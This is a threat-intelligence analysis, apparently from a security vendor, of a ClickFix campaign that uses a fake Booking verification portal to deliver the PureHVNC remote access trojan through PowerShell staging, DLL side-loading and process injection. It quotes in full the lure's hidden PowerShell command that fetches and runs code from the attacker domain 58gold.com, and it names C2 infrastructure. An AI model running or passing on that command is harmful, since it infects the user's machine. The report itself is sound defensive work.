ClickFix to PureHVNC: Multi-Stage Malware Delivery via Fake Booking Portal

Introduction

This campaign leverages the ClickFix social-engineering technique through a fake Booking-themed verification portal hosted at hxxps://bkngpanelcntlrguest[.]com to trick users into manually executing malicious PowerShell commands. By abusing legitimate Windows utilities such as PowerShell, the attackers achieve user-assisted code execution and initiate a multi-stage malware delivery chain.

The infection chain performs host reconnaissance using WMI/CIM, downloads staged ZIP payloads using stealth-focused HTTP requests and User-Agent spoofing, and establishes persistence through registry Run keys and scheduled tasks. The malware further employs in-memory PE loading and process injection into AddInProcess32.exe to evade detection and minimize forensic artifacts. Ultimately, the attack results in the deployment of the PureHVNC remote access trojan (RAT), enabling persistent remote access and attacker control.

Attack Flow Overview

1. Victim visits a fake Booking(dot)com themed verification portal
2. User is instructed to execute a malicious PowerShell command
3. Stage-1 PowerShell payload is downloaded and executed
4. System reconnaissance and AV discovery are performed
5. Host information is exfiltrated to attacker-controlled infrastructure
6. Stage-2 ZIP payload is downloaded and extracted
7. Persistence is established via Run keys and scheduled tasks
8. DLL side-loading through psl.exe executes the malicious DLL
9. PureHVNC payload is injected into AddInProcess32.exe
10. Remote access and persistence are established

At its core, the ClickFix infection chain relies on social engineering-driven user-assisted execution to initiate compromise. Victims interacting with the fake booking verification portal are instructed to open the Windows Run dialog (Win + R) and execute a malicious PowerShell command:

powershell -c "Start-Process -WindowStyle Hidden powershell -Args '-ExecutionPolicy Bypass -c iex(irm 58gold.com)'"

This command launches a hidden PowerShell instance, bypasses execution policy restrictions, and uses iex(irm …) to retrieve and execute PowerShell code directly in memory. By leveraging legitimate Windows utilities (PowerShell) and fileless execution techniques, the attackers minimize disk artifacts and evade conventional security controls, enabling stealthy initial access and staged malware delivery.

System Profiling

This module performs host reconnaissance using WMI/CIM, collecting detailed system, hardware, and security information including AV presence and admin privileges. The module demonstrates environment awareness through privilege checking, security software enumeration, and subsequent C2 beaconing for data exfiltration. The use of obfuscation, error handling, and structured telemetry highlights characteristics of a modern malware reconnaissance module.

Data Exfiltration

This module acts as a C2 beaconing routine (hxxps[:]//58gold.com[/]h0v6wg63gK4DY2Sbkpy7eOnbTqgRSpzYDTgpjubd3qg7), collecting detailed host reconnaissance data (user, hostname, OS version, CPU/GPU, RAM, AV info, domain, privileges) and sending it to a C2 server using Invoke-WebRequest. It uses HTTP GET with URL-encoded parameters, includes a random “noise” value to evade pattern detection, and supports optional fields like executed file name or custom messages.

A built-in fallback communication mechanism ensures minimal telemetry exfiltration even if the primary request fails, highlighting resilience and stealth in attacker-controlled telemetry.

Stage 2 Payload Delivery via ZIP Download

This module implements a resilient Stage 2 payload downloader that retrieves a ZIP file from a remote server using retry logic and exponential backoff. The downloader enhances reliability through dual download mechanisms using HttpClient and Invoke-WebRequest and enforces secure communication via TLS. The code includes stealth techniques like User-Agent spoofing, temporary file usage, and cleanup routines. It also performs strict validation checks (file size and ZIP integrity) before execution. Overall, this reflects a modern staged malware loader with robust and stealthy delivery mechanisms.

The PowerShell dropper downloads a ZIP archive from the compromised website clubcampestrededurango[.]com and extracts it into a hidden %LOCALAPPDATA% directory disguised as a legitimate libpsl installation. The package contains a malicious libpsl-5.dll placed alongside psl.exe, enabling DLL side-loading through DLL search order hijacking.

Persistence

Registry-Based Persistence

This module establishes persistence via the Run registry key for psl.exe file, ensuring the payload executes at every user logon. It uses an obfuscated, unique value name and verifies the entry after writing to ensure reliability. This reflects a common user-level persistence technique used by malware.

Scheduled Task based Persistence

The malware attempts fallback persistence by creating a scheduled task configured to execute the payload during user logon if registry-based persistence fails.

Trusted Binary (psl.exe) Abuse Through DLL Side-Loading

psl.exe is abused to load a malicious DLL, likely via DLL side-loading. By leveraging a trusted system binary, the attacker executes payload code under the guise of a legitimate process, helping evade traditional signature-based detection mechanisms. This technique is commonly used for stealthy execution and persistence in modern attacks.

PureHVNC Payload Staging with Process Injection

The malware writes a PureHVNC payload file to the %TEMP% directory and maps it into memory using NtCreateSection with the SEC_IMAGE flag, indicating PE image loading for in-memory execution. The PureHVNC payload is then injected into the legitimate .NET process AddInProcess32.exe, a technique commonly used for stealthy code execution and defense evasion. Finally, the temporary file is marked for deletion via NtSetInformationFile, minimizing forensic artifacts and supporting covert execution.

Mutex Creation

To ensure only a single instance of the malware runs on the victim system, the malware creates a mutex named “Pzxymiidmy”. If the mutex already exists, execution is aborted.

MITRE ATT&CK Mapping

Indicators of Compromise (IOCs)

File Hashes (SHA-256)

C2 URL

Detection and Mitigation Recommendations

Organizations can reduce exposure to ClickFix-style malware campaigns by implementing continuous monitoring, behavioral analytics, and threat correlation capabilities through Gurucul SIEM.

• Monitor Suspicious PowerShell Activity:Detect PowerShell execution involving iex(irm ...), execution policy bypasses, hidden PowerShell windows, and suspicious command-line arguments commonly associated with ClickFix delivery mechanisms.
• Detect User-Assisted Execution Techniques:Identify anomalous execution workflows involving the Windows Run dialog (Win + R), unexpected PowerShell child processes, and unusual user-driven command execution activity.
• Identify Persistence Mechanisms:Monitor registry Run key modifications, scheduled task creation events, and suspicious startup persistence techniques associated with multi-stage malware infections.
• Detect DLL Side-Loading Activity:Correlate execution events where trusted binaries such as pls.exe load unsigned or suspicious DLLs from abnormal file paths, helping identify DLL side-loading attempts.
• Monitor Process Injection and In-Memory Execution:Detect suspicious process injection behavior, section mapping activity, and anomalous execution involving legitimate processes such as AddInProcess32.exe.
• Correlate Multi-Stage Attack Activity:Use behavioral correlation to connect reconnaissance, payload staging, persistence creation, and command-and-control communications into a single attack timeline for faster incident investigation.
• Monitor Beaconing and Suspicious Network Activity:Identify outbound connections to newly observed or low-reputation domains, suspicious HTTPS communications, and repeated beaconing behavior associated with command-and-control infrastructure.
• Leverage Threat Intelligence and IOC Correlation:Continuously correlate malicious hashes, domains, URLs, and infrastructure indicators against security telemetry to accelerate detection and threat hunting activities.
• Prioritize Behavioral Detection:Since this campaign heavily abuses legitimate Windows utilities and fileless execution techniques, organizations should prioritize behavioral analytics and anomaly-based detections rather than relying solely on static signatures or hash-based detections.

Conclusion

This campaign demonstrates how ClickFix-style social engineering continues to evolve into an effective initial access technique for delivering sophisticated malware frameworks. By combining user-assisted PowerShell execution, staged payload delivery, DLL side-loading, persistence mechanisms, and in-memory process injection, the operators behind this activity achieve stealthy deployment of the PureHVNC RAT while minimizing forensic visibility.

The campaign also highlights increasing abuse of legitimate Windows utilities and trusted binaries to evade conventional security controls. Organizations should prioritize behavioral detection strategies focused on suspicious PowerShell execution, persistence creation, DLL side-loading, and anomalous process injection activity rather than relying solely on static indicators.